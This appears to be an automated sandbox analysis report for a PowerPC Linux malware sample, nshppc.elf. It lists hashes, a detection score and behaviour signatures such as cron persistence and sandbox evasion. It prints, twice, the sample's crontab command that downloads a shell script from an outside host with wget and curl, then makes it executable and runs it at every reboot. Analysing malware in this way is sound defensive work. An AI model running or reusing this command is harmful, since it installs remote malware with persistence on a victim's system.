Linux Analysis Report
nshppc.elf

Overview

General Information

Sample name: nshppc.elf
Analysis ID: 1542849
MD5: 29a8d657f77fbbb6816b15a223770f27
SHA1: c13aee7d2d3856e6a12dff9e14e9cd1803623ca3
SHA256: d499423beedb16572846748e277aa66856b41f66a5ecaa08cfd1d00754a25f91
Tags: elfuser-abuse_ch

Detection

Score: 56
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Reads system version information
Sample has stripped symbol table
Sample listens on a socket
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)

AV Detection

Source: nshppc.elf ReversingLabs: Detection: 21%
Source: tmp.5oUS4H.18.dr String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: /tmp/nshppc.elf (PID: 5711) Socket: 127.0.0.1:1172
Source: tmp.5oUS4H.18.dr String found in binary or memory: http://hailcocks.ru/wget.sh;
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal56.troj.linELF@0/1@0/0

Persistence and Installation Behavior

Source: /bin/sh (PID: 5721) Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 5720) Crontab executable: /usr/bin/crontab -> crontab -
Source: /usr/bin/crontab (PID: 5720) File: /var/spool/cron/crontabs/tmp.5oUS4H
Source: /usr/bin/crontab (PID: 5720) File: /var/spool/cron/crontabs/root
Source: /tmp/nshppc.elf (PID: 5713) Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
Source: /usr/lib/snapd/snap-failure (PID: 5855) Systemctl executable: /usr/bin/systemctl -> systemctl stop snapd.socket
Source: /usr/lib/snapd/snap-failure (PID: 5839) Reads version info: /proc/version
Source: submitted sample Stderr: no crontab for root: exit code = 0
Source: /tmp/nshppc.elf (PID: 5885) Sleeps longer than 60s: 60.0s
Source: /tmp/nshppc.elf (PID: 5711) Queries kernel information via 'uname'
Source: nshppc.elf, 5711.1.0000558c82996000.0000558c82a6b000.rw-.sdmp, nshppc.elf, 5722.1.0000558c82996000.0000558c82a6b000.rw-.sdmp Binary or memory string: !/etc/qemu-binfmt/ppc1
Source: nshppc.elf, 5711.1.0000558c82996000.0000558c82a6b000.rw-.sdmp, nshppc.elf, 5722.1.0000558c82996000.0000558c82a6b000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/ppc
Source: nshppc.elf, 5711.1.00007ffda4401000.00007ffda4422000.rw-.sdmp, nshppc.elf, 5722.1.00007ffda4401000.00007ffda4422000.rw-.sdmp Binary or memory string: /usr/bin/qemu-ppc
Source: nshppc.elf, 5711.1.00007ffda4401000.00007ffda4422000.rw-.sdmp, nshppc.elf, 5722.1.00007ffda4401000.00007ffda4422000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-ppc/tmp/nshppc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nshppc.elf
No contacted IP infos